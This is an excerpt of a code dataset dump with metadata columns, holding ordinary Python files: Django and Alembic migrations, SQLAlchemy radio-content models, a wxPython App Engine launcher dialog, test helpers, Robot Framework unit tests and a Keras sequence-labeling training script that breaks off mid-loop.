repo_name
stringlengths 6
61
| path
stringlengths 4
230
| copies
stringlengths 1
3
| size
stringlengths 4
6
| text
stringlengths 1.01k
850k
| license
stringclasses 15
values | hash
int64 -9,220,477,234,079,998,000
9,219,060,020B
| line_mean
float64 11.6
96.6
| line_max
int64 32
939
| alpha_frac
float64 0.26
0.9
| autogenerated
bool 1
class | ratio
float64 1.62
6.1
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
nimbis/django-central-message | central_message/south_migrations/0001_initial.py | 1 | 6941 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'CentralMessage'
db.create_table(u'central_message_centralmessage', (
(u'message_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['messages_extends.Message'], unique=True, primary_key=True)),
('generated', self.gf('django.db.models.fields.BooleanField')(default=False)),
('generated_on', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
))
db.send_create_signal(u'central_message', ['CentralMessage'])
# Adding model 'CentralUserMessage'
db.create_table(u'central_message_centralusermessage', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('message', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['messages_extends.Message'], unique=True, null=True, on_delete=models.SET_NULL)),
('master', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'central_message_centralusermessage_related', to=orm['central_message.CentralMessage'])),
))
db.send_create_signal(u'central_message', ['CentralUserMessage'])
def backwards(self, orm):
# Deleting model 'CentralMessage'
db.delete_table(u'central_message_centralmessage')
# Deleting model 'CentralUserMessage'
db.delete_table(u'central_message_centralusermessage')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'central_message.centralmessage': {
'Meta': {'object_name': 'CentralMessage', '_ormbases': [u'messages_extends.Message']},
'generated': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'generated_on': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'message_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['messages_extends.Message']", 'unique': 'True', 'primary_key': 'True'})
},
u'central_message.centralusermessage': {
'Meta': {'object_name': 'CentralUserMessage'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'master': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'central_message_centralusermessage_related'", 'to': u"orm['central_message.CentralMessage']"}),
'message': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['messages_extends.Message']", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'messages_extends.message': {
'Meta': {'object_name': 'Message'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'expires': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'extra_tags': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.IntegerField', [], {}),
'message': ('django.db.models.fields.TextField', [], {}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'read': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['central_message'] | bsd-3-clause | 7,461,150,924,728,953,000 | 69.121212 | 195 | 0.585362 | false | 3.703842 | false | false | false |
rootio/rootio_web | rootio/content/models.py | 1 | 9010 | import pytz, datetime
from coaster.sqlalchemy import BaseMixin
from sqlalchemy.sql import func
from sqlalchemy.ext.hybrid import hybrid_property
from ..extensions import db
from ..utils import STRING_LEN
import datetime
t_tracknetwork = db.Table(
u'content_tracknetwork',
db.Column(u'track_id', db.ForeignKey('content_track.id')),
db.Column(u'network_id', db.ForeignKey('radio_network.id'))
)
class ContentTrack(BaseMixin, db.Model):
"""A track to which audio content is added"""
__tablename__ = u'content_track'
name = db.Column(db.String(STRING_LEN))
description = db.Column(db.Text)
uri = db.Column(db.String(200))
# add array
type_id = db.Column(db.ForeignKey('content_type.id'))
uploaded_by = db.Column(db.ForeignKey('user_user.id'))
deleted = db.Column(db.Boolean, default=False)
continuous_play = db.Column(db.Boolean)
content_type = db.relationship(u'ContentType', backref=db.backref('track_content'))
networks = db.relationship(u'Network', secondary=u'content_tracknetwork', backref=db.backref('tracks'))
def __unicode__(self):
return self.name
class ContentUploads(BaseMixin, db.Model):
"""An upload to a particular track"""
__tablename__ = u'content_uploads'
name = db.Column(db.String(STRING_LEN))
uri = db.Column(db.String(200))
ok_to_play = db.Column(db.Boolean)
order = db.Column(db.Integer, default=0)
deleted = db.Column(db.Boolean, default=False)
uploaded_by = db.Column(db.ForeignKey('user_user.id'))
track_id = db.Column(db.ForeignKey('content_track.id'))
type_id = db.Column(db.ForeignKey('content_type.id'))
date_created = db.Column(db.DateTime(timezone=True), server_default=func.now())
updated_at = db.Column(db.DateTime(timezone=True), server_default=func.now())
track = db.relationship(u'ContentTrack', backref=db.backref('files'))
def __unicode__(self):
return self.name
@hybrid_property
def is_remote(self):
return self.uri.startswith('http://') or self.uri.startswith('https://')
class CommunityMenu(BaseMixin, db.Model):
"""An IVR menu for communities to record ads, announcements and greetings"""
__tablename__ = u"content_communitymenu"
station_id = db.Column(db.ForeignKey('radio_station.id'))
welcome_message = db.Column(db.String(200))
welcome_message_txt = db.Column(db.Text())
no_input_message = db.Column(db.String(200))
no_input_message_txt = db.Column(db.Text())
days_prompt = db.Column(db.String(200))
days_prompt_txt = db.Column(db.Text())
record_prompt = db.Column(db.String(200))
record_prompt_txt = db.Column(db.Text())
message_type_prompt = db.Column(db.String(200))
message_type_prompt_txt = db.Column(db.Text())
finalization_prompt = db.Column(db.String(200))
finalization_prompt_txt = db.Column(db.Text())
goodbye_message = db.Column(db.String(200))
goodbye_message_txt = db.Column(db.Text())
use_tts = db.Column(db.Boolean(), default=False)
prefetch_tts = db.Column(db.Boolean(), default=True)
date_created = db.Column(db.DateTime(timezone=True), default=datetime.datetime.utcnow)
updated_at = db.Column(db.DateTime(timezone=True), default=datetime.datetime.utcnow)
station = db.relationship(u'Station', backref=db.backref('community_menu'))
deleted = db.Column(db.Boolean, default=False, nullable=False)
class CommunityContent(BaseMixin, db.Model):
"""A message left by a member of the community (ad, greeting, announcement)"""
__tablename__ = u"content_communitycontent"
station_id = db.Column(db.ForeignKey('radio_station.id'))
originator = db.Column(db.String(20))
message = db.Column(db.String(100))
duration = db.Column(db.Integer)
date_created = db.Column(db.DateTime(timezone=True), server_default=func.now())
type_code = db.Column(db.Integer)
valid_until = db.Column(db.DateTime(timezone=True))
approved = db.Column(db.Boolean(), default=False)
deleted = db.Column(db.Boolean, default=False)
station = db.relationship(u'Station', backref=db.backref('community_content'))
class ContentPodcast(BaseMixin, db.Model):
"""Definition of a podcast"""
__tablename__ = u'content_podcast'
name = db.Column(db.String(STRING_LEN))
uri = db.Column(db.String(200))
description = db.Column(db.String(1000))
ok_to_play = db.Column(db.Boolean)
created_by = db.Column(db.ForeignKey('user_user.id'))
date_created = db.Column(db.DateTime(timezone=True), server_default=func.now())
updated_at = db.Column(db.DateTime(timezone=True), server_default=func.now())
deleted = db.Column(db.Boolean)
class ContentPodcastDownload(BaseMixin, db.Model):
"""Download of a podcast file"""
__tablename__ = u'content_podcastdownload'
file_name = db.Column(db.String(255, convert_unicode=True))
duration = db.Column(db.String(10))
title = db.Column(db.String(255, convert_unicode=True))
summary = db.Column(db.Text(None, convert_unicode=True))
podcast_id = db.Column(db.ForeignKey('content_podcast.id'))
date_published = db.Column(db.DateTime(timezone=True))
date_downloaded = db.Column(db.DateTime(timezone=True), server_default=func.now())
date_created = db.Column(db.DateTime(timezone=True), server_default=func.now())
podcast = db.relationship(u'ContentPodcast', backref=db.backref('podcast_downloads'))
class ContentMusic(BaseMixin, db.Model):
"""Music files on the phone of a station"""
__tablename__ = u'content_music'
title = db.Column(db.String(300, convert_unicode=True))
album_id = db.Column(db.ForeignKey('content_musicalbum.id'))
duration = db.Column(db.Integer)
station_id = db.Column(db.ForeignKey('radio_station.id', ondelete='SET NULL'), nullable=True)
artist_id = db.Column(db.ForeignKey('content_musicartist.id', ondelete='SET NULL'), nullable=True)
station = db.relationship(u'Station', backref=db.backref('music'))
artist = db.relationship(u'ContentMusicArtist', backref=db.backref('music'))
date_created = db.Column(db.DateTime(timezone=True), server_default=func.now())
class ContentMusicAlbum(BaseMixin, db.Model):
"""Albums of Music files on the phone of a station"""
__tablename__ = u'content_musicalbum'
title = db.Column(db.String(255, convert_unicode=True))
station_id = db.Column(db.ForeignKey('radio_station.id'))
date_created = db.Column(db.DateTime(timezone=True), server_default=func.now())
station = db.relationship(u'Station', backref=db.backref('albums'))
class ContentMusicArtist(BaseMixin, db.Model):
"""Artists for the media on phones"""
__tablename__ = u'content_musicartist'
title = db.Column(db.String(255, convert_unicode=True))
station_id = db.Column(db.ForeignKey('radio_station.id'))
date_created = db.Column(db.DateTime(timezone=True), server_default=func.now())
station = db.relationship(u'Station', backref=db.backref('artists'))
class ContentMusicPlaylist(BaseMixin, db.Model):
"""Playlist of the music files on a station"""
__tablename__ = u'content_musicplaylist'
title = db.Column(db.String(STRING_LEN))
station_id = db.Column(db.ForeignKey('radio_station.id'))
description = db.Column(db.Text)
date_created = db.Column(db.DateTime(timezone=True), server_default=func.now())
station = db.relationship(u'Station', backref=db.backref('playlists'))
deleted = db.Column(db.Boolean)
class ContentMusicPlayListItemType(BaseMixin, db.Model):
"""Type of Items in a playlist mapping to media - """
__tablename__ = u'content_musicplaylistitemtype'
title = db.Column(db.String(STRING_LEN))
t_musicartist = db.Table(
u'content_music_musicartist',
db.Column(u'music_id', db.ForeignKey('content_music.id')),
db.Column(u'artist_id', db.ForeignKey('content_musicartist.id'))
)
class ContentMusicPlaylistItem(BaseMixin, db.Model):
"""Definition of an item (song, album, artist) on a playlist"""
__tablename__ = 'content_musicplaylistitem'
playlist_id = db.Column(db.ForeignKey('content_musicplaylist.id'))
playlist_item_id = db.Column(db.Integer)
playlist_item_type_id = db.Column(db.ForeignKey('content_musicplaylistitemtype.id'))
updated_at = db.Column(db.DateTime(), server_default=func.now())
created_at = db.Column(db.DateTime(), server_default=func.now())
deleted = db.Column(db.Boolean, default=False)
class ContentStream(BaseMixin, db.Model):
"""Definition of a stream"""
__tablename__ = u'content_stream'
name = db.Column(db.String(STRING_LEN))
uri = db.Column(db.String(200))
description = db.Column(db.String(1000))
ok_to_play = db.Column(db.Boolean)
created_by = db.Column(db.ForeignKey('user_user.id'))
date_created = db.Column(db.DateTime(timezone=True), server_default=func.now())
updated_at = db.Column(db.DateTime(timezone=True), server_default=func.now())
deleted = db.Column(db.Boolean)
| agpl-3.0 | -8,483,328,077,250,222,000 | 39.585586 | 107 | 0.696781 | false | 3.334567 | false | false | false |
pcamp/google-appengine-wx-launcher | launcher/addexisting_controller.py | 28 | 5297 | #!/usr/bin/env python
#
# Copyright 2008 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Controller (MVC) for the add existing (project) dialog.
A Google App Engine Application is called a 'project' internally to
the launcher to prevent confusion. Class App is for the launcher
application itself, and class Project is for an App Engine
Application (a 'project').
"""
import os
import wx
import dialog_controller_base
import launcher
from wxgladegen import project_dialogs
class AddExistingController(dialog_controller_base.DialogControllerBase):
"""Controller for an Add Existing Project dialog.
The controller is responsible for displaying the dialog, filling it
in, and (if not cancelled) reading data back and creating a new
launcher.Project.
"""
def __init__(self, dialog=None):
"""Initialize a new controller.
Args:
dialog: the dialog to use. If None, a default is chosen.
"""
super(AddExistingController, self).__init__()
self.dialog = (dialog or project_dialogs.AddExistingProjectDialog(None))
self.MakeBindings()
# Make sure we don't create a Project until we've actually OK'd the dialog.
self._dialog_return_value = None
def _BrowseForDirectory(self, evt):
"""Browse for a directory, then set its path in the dialog.
Called directly from UI.
"""
# Default path is the parent directory
default_path = self.GetPath()
if os.path.exists(default_path):
default_path = os.path.join(default_path, '..')
else:
default_path = ''
# On MacOSX, wx.DD_DIR_MUST_EXIST doesn't appear to be honored. :-(
dirname = wx.DirSelector(message='Pick an existing App Engine App',
defaultPath=default_path,
style=wx.DD_DIR_MUST_EXIST)
if dirname:
self.SetPath(dirname)
def MakeBindings(self):
"""Bind events on our dialog."""
self.MakeBindingsOKCancel()
self.dialog.Bind(wx.EVT_BUTTON, self._BrowseForDirectory,
self.dialog.app_browse_button)
def SetPort(self, port):
"""Set the port in the dialog.
Args:
port: the port number to use.
"""
self.dialog.app_port_text_ctrl.SetValue(str(port))
def SetPath(self, path):
"""Set the path in the dialog.
Args:
path: the path to use.
"""
if not path:
path = ''
self.dialog.app_path_text_ctrl.SetValue(path)
def GetPort(self):
"""Return the port in the dialog."""
return self.dialog.app_port_text_ctrl.GetValue()
def GetPath(self):
"""Return the path in the dialog."""
return self.dialog.app_path_text_ctrl.GetValue()
def ShowModal(self):
"""Show our dialog modally.
Returns:
wx.ID_OK if Update was clicked; wx.ID_CANCEL if Cancel was clicked.
"""
self._dialog_return_value = self.dialog.ShowModal()
return self._dialog_return_value
def _SanityCheckPath(self, path, check_contents=True):
"""Sanity check new values before making a Project.
Args:
path: a filesystem path (from the dialog)
check_contents: if True, check if the contents look valid.
If invalid, warn, but allow things to continue.
Returns:
True if we should make a project from this value.
"""
if not (path and os.path.isdir(path)):
self.FailureMessage('Path invalid; cannot make project.',
'Add Application')
return False
if check_contents and not os.path.exists(os.path.join(path, 'app.yaml')):
self.FailureMessage('Specified path doesn\'t look like an application; ' +
'%s/app.yaml not present. (Allowing anyway.)' % path,
'Add Application')
# fall through; looks bad but don't deny just in case.
# We made it!
return True
def _SanityCheckPort(self, port):
"""Sanity check new values before making a Project.
Args:
port: the port for the project (also from the dialog)
Returns:
True if we should make a project from this value.
"""
try:
port = int(port)
except ValueError:
port = None
if not port or port < 1024:
self.FailureMessage('Port invalid (not a number or less than 1024); ' +
'cannot make project.',
'Add Application')
return False
return True
def Project(self):
"""Return a project created from interaction with this dialog.
Returns:
A launcher.Project, or None.
"""
if self._dialog_return_value != wx.ID_OK:
return None
path = self.GetPath()
port = self.GetPort()
if not (self._SanityCheckPath(path) and self._SanityCheckPort(port)):
return None
return launcher.Project(path, port)
| apache-2.0 | 2,448,839,151,527,251,000 | 30.909639 | 80 | 0.656976 | false | 4.02202 | false | false | false |
snicoper/snicoper.com | tests/unit/images.py | 1 | 1790 | import os
from django.core.files.uploadedfile import SimpleUploadedFile
from PIL import Image
from config.settings.test import MEDIA_ROOT
def simple_uploaded_file(image_path):
"""Crea una SimpleUploadedFile para campos de modelo
ImageField, FileField.
Args:
image_path (str): Path de la imagen a "subir".
Returns:
SimpleUploadedFile:
"""
if not os.path.exists(image_path):
raise FileNotFoundError('El "{}" archivo no existe'.format(image_path))
name = os.path.basename(image_path)
with open(image_path, 'rb') as fh:
image = SimpleUploadedFile(
name=name,
content=fh.read(),
content_type='image/jpeg'
)
return image
def create_image(name='test.png', size=(150, 150), ext='png'):
"""Crea una imagen y la guarda en get_image_path.
Args:
name (str): Nombre de la imagen, por defecto test.png.
size (list): width/height de la imagen, por defecto (150, 150).
ext (str): Extension de la imagen sin el (.), por defecto png
Returns:
Imagen creada
"""
color = (255, 0, 0, 0)
image = Image.new('RGB', size=size, color=color)
image.save(get_image_path(name), ext)
return image
def get_image_path(name='test.png'):
"""Obtiene un path con la ruta y nombre de la imagen /MEDIA_ROOT/{name}.
Args:
name (str): Nombre de la imagen.
Returns:
El path con el nombre del archivo en forma de /MEDIA_ROOT/imagen.png
"""
return '{}/{}'.format(MEDIA_ROOT, name)
def delete_image(name='test.png'):
"""Elimina una imagen.
Args:
name (str): Nombre de la imagen.
"""
image_path = get_image_path(name)
if os.path.exists(image_path):
os.remove(image_path)
| mit | -7,806,430,896,301,290,000 | 24.942029 | 79 | 0.621229 | false | 3.390152 | false | false | false |
charlesj/Apollo | database/versions/5da21d856a57_add_jobs.py | 1 | 1454 | """Add Jobs
Revision ID: 5da21d856a57
Revises: edd910853060
Create Date: 2017-07-30 16:43:35.839411
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '5da21d856a57'
down_revision = 'edd910853060'
branch_labels = None
depends_on = None
def upgrade():
op.create_table(
'jobs',
sa.Column('id', sa.Integer, primary_key=True, autoincrement=True),
sa.Column('command_name', sa.String(100), nullable=False),
sa.Column('parameters', sa.Text(), nullable=False),
sa.Column('schedule', sa.Text(), nullable=False),
sa.Column('created_at', sa.DateTime(timezone=True), nullable=False),
sa.Column('last_executed_at', sa.DateTime(timezone=True), nullable=True),
sa.Column('expired_at', sa.DateTime(timezone=True), nullable=True),
)
op.create_table(
'job_history',
sa.Column('id', sa.Integer, primary_key=True, autoincrement=True),
sa.Column('job_id', sa.Integer, nullable=False),
sa.Column('execution_id', sa.String(256), nullable=False),
sa.Column('executed_at', sa.DateTime(timezone=True), nullable=False),
sa.Column('execution_ended', sa.DateTime(timezone=True), nullable=True),
sa.Column('results', sa.Text(), nullable=True),
sa.Column('result_type', sa.String(100), nullable=True),
)
def downgrade():
op.drop_table('jobs')
op.drop_table('job_history')
| mit | 26,698,565,045,155,436 | 32.045455 | 81 | 0.656809 | false | 3.342529 | false | false | false |
synsun/robotframework | utest/running/test_userhandlers.py | 1 | 6437 | import unittest
from robot.errors import DataError
from robot.model import Keywords
from robot.running.userkeyword import (EmbeddedArgs, EmbeddedArgsTemplate,
UserKeywordHandler)
from robot.running.arguments import EmbeddedArguments, UserKeywordArgumentParser
from robot.utils.asserts import assert_equal, assert_true, assert_raises
class Fake(object):
value = ''
message = ''
def __iter__(self):
return iter([])
class FakeArgs(object):
def __init__(self, args):
self.value = args
def __nonzero__(self):
return bool(self.value)
def __iter__(self):
return iter(self.value)
class HandlerDataMock:
def __init__(self, name, args=[]):
self.name = name
self.args = FakeArgs(args)
self.metadata = {}
self.keywords = Keywords()
self.defaults = []
self.varargs = None
self.minargs = 0
self.maxargs = 0
self.return_value = None
self.doc = Fake()
self.timeout = Fake()
self.return_ = Fake()
self.tags = ()
self.teardown = None
def EAT(name, args=[]):
handler = HandlerDataMock(name, args)
embedded = EmbeddedArguments(name)
return EmbeddedArgsTemplate(handler, 'resource', embedded)
class TestEmbeddedArgs(unittest.TestCase):
def setUp(self):
self.tmp1 = EAT('User selects ${item} from list')
self.tmp2 = EAT('${x} * ${y} from "${z}"')
def test_no_embedded_args(self):
assert_true(not EmbeddedArguments('No embedded args here'))
assert_true(EmbeddedArguments('${Yes} embedded args here'))
def test_get_embedded_arg_and_regexp(self):
assert_equal(self.tmp1.embedded_args, ['item'])
assert_equal(self.tmp1.embedded_name.pattern,
'^User\\ selects\\ (.*?)\\ from\\ list$')
assert_equal(self.tmp1.name, 'User selects ${item} from list')
def test_get_multiple_embedded_args_and_regexp(self):
assert_equal(self.tmp2.embedded_args, ['x', 'y', 'z'])
assert_equal(self.tmp2.embedded_name.pattern,
'^(.*?)\\ \\*\\ (.*?)\\ from\\ \\"(.*?)\\"$')
def test_create_handler_when_no_match(self):
assert_raises(ValueError, EmbeddedArgs, 'Not matching', self.tmp1)
def test_create_handler_with_one_embedded_arg(self):
handler = EmbeddedArgs('User selects book from list', self.tmp1)
assert_equal(handler.embedded_args, [('item', 'book')])
assert_equal(handler.name, 'User selects book from list')
assert_equal(handler.longname, 'resource.User selects book from list')
handler = EmbeddedArgs('User selects radio from list', self.tmp1)
assert_equal(handler.embedded_args, [('item', 'radio')])
assert_equal(handler.name, 'User selects radio from list')
assert_equal(handler.longname, 'resource.User selects radio from list')
def test_create_handler_with_many_embedded_args(self):
handler = EmbeddedArgs('User * book from "list"', self.tmp2)
assert_equal(handler.embedded_args,
[('x', 'User'), ('y', 'book'), ('z', 'list')])
def test_create_handler_with_empty_embedded_arg(self):
handler = EmbeddedArgs('User selects from list', self.tmp1)
assert_equal(handler.embedded_args, [('item', '')])
def test_create_handler_with_special_characters_in_embedded_args(self):
handler = EmbeddedArgs('Janne & Heikki * "enjoy" from """', self.tmp2)
assert_equal(handler.embedded_args,
[('x', 'Janne & Heikki'), ('y', '"enjoy"'), ('z', '"')])
def test_embedded_args_without_separators(self):
template = EAT('This ${does}${not} work so well')
handler = EmbeddedArgs('This doesnot work so well', template)
assert_equal(handler.embedded_args, [('does', ''), ('not', 'doesnot')])
def test_embedded_args_with_separators_in_values(self):
template = EAT('This ${could} ${work}-${OK}')
handler = EmbeddedArgs("This doesn't really work---", template)
assert_equal(handler.embedded_args,
[('could', "doesn't"), ('work', 'really work'), ('OK', '--')])
def test_creating_handlers_is_case_insensitive(self):
handler = EmbeddedArgs('User SELECts book frOm liST', self.tmp1)
assert_equal(handler.embedded_args, [('item', 'book')])
assert_equal(handler.name, 'User SELECts book frOm liST')
assert_equal(handler.longname, 'resource.User SELECts book frOm liST')
def test_embedded_args_handler_has_all_needed_attributes(self):
normal = UserKeywordHandler(HandlerDataMock('My name'), None)
embedded = EmbeddedArgs('My name', EAT('My ${name}'))
for attr in dir(normal):
assert_true(hasattr(embedded, attr), "'%s' missing" % attr)
class TestGetArgSpec(unittest.TestCase):
def test_no_args(self):
self._verify('')
def test_one_arg(self):
self._verify('${arg1}', ['arg1',])
def test_one_vararg(self):
self._verify('@{varargs}', exp_varargs='varargs')
def test_one_default(self):
self._verify('${arg1} ${arg2}=default @{varargs}',
['arg1', 'arg2'], ['default'], 'varargs')
def test_one_empty_default(self):
self._verify('${arg1} ${arg2}= @{varargs}',
['arg1', 'arg2'], [''], 'varargs')
def test_many_defaults(self):
self._verify('${arg1}=default1 ${arg2}=default2 ${arg3}=default3',
['arg1', 'arg2', 'arg3'],
['default1', 'default2', 'default3'])
def _verify(self, in_args, exp_args=[], exp_defaults=[], exp_varargs=None):
argspec = self._parse(in_args)
assert_equal(argspec.positional, exp_args)
assert_equal(argspec.defaults, exp_defaults)
assert_equal(argspec.varargs, exp_varargs)
def _parse(self, in_args):
return UserKeywordArgumentParser().parse(in_args.split())
def test_many_varargs_raises(self):
assert_raises(DataError, self._parse, '@{varargs} @{varargs2}')
def test_args_after_varargs_raises(self):
assert_raises(DataError, self._parse, '@{varargs} ${arg1}')
def test_get_defaults_before_args_raises(self):
assert_raises(DataError, self._parse, '${args1}=default ${arg2}')
if __name__ == '__main__':
unittest.main()
| apache-2.0 | -8,467,912,947,278,760,000 | 36.424419 | 84 | 0.606494 | false | 3.69094 | true | false | false |
danche354/Sequence-Labeling | chunk/senna-hash-2-pos-d6-128-64.py | 1 | 6678 | from keras.models import Model
from keras.layers import Input, Masking, Dense, LSTM
from keras.layers import Dropout, TimeDistributed, Bidirectional, merge
from keras.layers.embeddings import Embedding
from keras.utils import np_utils
import numpy as np
import pandas as pd
import sys
import math
import os
from datetime import datetime
# add path
sys.path.append('../')
sys.path.append('../tools')
from tools import conf
from tools import load_data
from tools import prepare
from tools import plot
np.random.seed(0)
# train hyperparameters
step_length = conf.chunk_step_length
pos_length = conf.chunk_pos_length
emb_vocab = conf.senna_vocab
emb_length = conf.senna_length
hash_vocab = conf.chunk_hash_vocab
hash_length = conf.chunk_hash_length
output_length = conf.chunk_NP_length
split_rate = conf.chunk_split_rate
batch_size = conf.batch_size
nb_epoch = conf.nb_epoch
model_name = os.path.basename(__file__)[:-3]
folder_path = 'model/%s'%model_name
if not os.path.isdir(folder_path):
os.makedirs(folder_path)
# the data, shuffled and split between train and test sets
train_data, dev_data = load_data.load_chunk(dataset='train.txt', split_rate=split_rate)
train_samples = len(train_data)
dev_samples = len(dev_data)
print('train shape:', train_samples)
print('dev shape:', dev_samples)
print()
word_embedding = pd.read_csv('../preprocessing/senna/embeddings.txt', delimiter=' ', header=None)
word_embedding = word_embedding.values
word_embedding = np.concatenate([np.zeros((1,emb_length)),word_embedding, np.random.uniform(-1,1,(1,emb_length))])
hash_embedding = pd.read_csv('../preprocessing/chunk-auto-encoder-2/auto-encoder-embeddings.txt', delimiter=' ', header=None)
hash_embedding = hash_embedding.values
hash_embedding = np.concatenate([np.zeros((1,hash_length)),hash_embedding, np.random.rand(1,hash_length)])
embed_index_input = Input(shape=(step_length,))
embedding = Embedding(emb_vocab+2, emb_length, weights=[word_embedding], mask_zero=True, input_length=step_length)(embed_index_input)
hash_index_input = Input(shape=(step_length,))
encoder_embedding = Embedding(hash_vocab+2, hash_length, weights=[hash_embedding], mask_zero=True, input_length=step_length)(hash_index_input)
pos_input = Input(shape=(step_length, pos_length))
senna_hash_pos_merge = merge([embedding, encoder_embedding, pos_input], mode='concat')
input_mask = Masking(mask_value=0)(senna_hash_pos_merge)
dp_1 = Dropout(0.6)(input_mask)
hidden_1 = Bidirectional(LSTM(128, return_sequences=True))(dp_1)
hidden_2 = Bidirectional(LSTM(64, return_sequences=True))(hidden_1)
dp_2 = Dropout(0.6)(hidden_2)
output = TimeDistributed(Dense(output_length, activation='softmax'))(dp_2)
model = Model(input=[embed_index_input,hash_index_input,pos_input], output=output)
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
print(model.summary())
number_of_train_batches = int(math.ceil(float(train_samples)/batch_size))
number_of_dev_batches = int(math.ceil(float(dev_samples)/batch_size))
print('start train %s ...\n'%model_name)
best_accuracy = 0
best_epoch = 0
all_train_loss = []
all_dev_loss = []
all_dev_accuracy = []
log = open('%s/model_log.txt'%folder_path, 'w')
start_time = datetime.now()
print('train start at %s\n'%str(start_time))
log.write('train start at %s\n\n'%str(start_time))
for epoch in range(nb_epoch):
start = datetime.now()
print('-'*60)
print('epoch %d start at %s'%(epoch, str(start)))
log.write('-'*60+'\n')
log.write('epoch %d start at %s\n'%(epoch, str(start)))
train_loss = 0
dev_loss = 0
np.random.shuffle(train_data)
for i in range(number_of_train_batches):
train_batch = train_data[i*batch_size: (i+1)*batch_size]
embed_index, hash_index, pos, label, length, sentence = prepare.prepare_chunk(batch=train_batch, gram='bi')
pos = np.array([(np.concatenate([np_utils.to_categorical(p, pos_length), np.zeros((step_length-length[l], pos_length))])) for l,p in enumerate(pos)])
y = np.array([np_utils.to_categorical(each, output_length) for each in label])
train_metrics = model.train_on_batch([embed_index, hash_index, pos], y)
train_loss += train_metrics[0]
all_train_loss.append(train_loss)
correct_predict = 0
all_predict = 0
for j in range(number_of_dev_batches):
dev_batch = dev_data[j*batch_size: (j+1)*batch_size]
embed_index, hash_index, pos, label, length, sentence = prepare.prepare_chunk(batch=dev_batch, gram='bi')
pos = np.array([(np.concatenate([np_utils.to_categorical(p, pos_length), np.zeros((step_length-length[l], pos_length))])) for l,p in enumerate(pos)])
y = np.array([np_utils.to_categorical(each, output_length) for each in label])
# for loss
dev_metrics = model.test_on_batch([embed_index, hash_index, pos], y)
